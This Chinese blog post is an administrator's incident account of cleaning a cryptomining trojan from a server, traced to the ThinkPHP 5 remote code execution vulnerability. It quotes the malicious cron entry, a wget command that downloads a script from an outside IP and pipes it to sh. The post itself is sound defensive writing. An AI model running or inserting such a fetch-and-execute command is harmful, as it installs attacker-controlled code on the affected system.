溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
小編給大家分享一下如何處理一個利用thinkphp5遠程代碼執行漏洞挖礦的木馬,希望大家閱讀完這篇文章之后都有所收獲,下面讓我們一起去探討吧!
記一次掛馬清除經歷:處理一個利用thinkphp5遠程代碼執行漏洞挖礦的木馬
昨天發現 一臺服務器突然慢了 top 顯示 幾個進程100%以上的cpu使用
執行命令為 :
/tmp/php -s /tmp/p2.conf
基本可以確定是被掛馬了
下一步確定來源
last 沒有登陸記錄
先干掉這幾個進程,但是幾分鐘之后又出現了
先看看這個木馬想干什么吧
netstat 看到 這個木馬開啟了一個端口和國外的某個ip建立了連接
但是tcpdump了一小會兒 沒有發現任何數據傳遞
這他是想干啥?
繼續查看日志吧
在cron日志中發現了www用戶 有一個crontab定時操作 基本就是這個問題了
wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1
順著下載了幾個問題,看了看 應該是個挖礦的木馬程序
服務器上的www用戶 是安裝 lnmp 創建的,看了來源很可能就是web漏洞了。
再看/tmp下的php的權限 就是www的
查看 lnmp下幾個站的日志 發現是利用 thinkphp 5最近爆出的遠程代碼執行漏洞
修復一下問題解決
看完了這篇文章,相信你對“如何處理一個利用thinkphp5遠程代碼執行漏洞挖礦的木馬”有了一定的了解,如果想了解更多相關知識,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
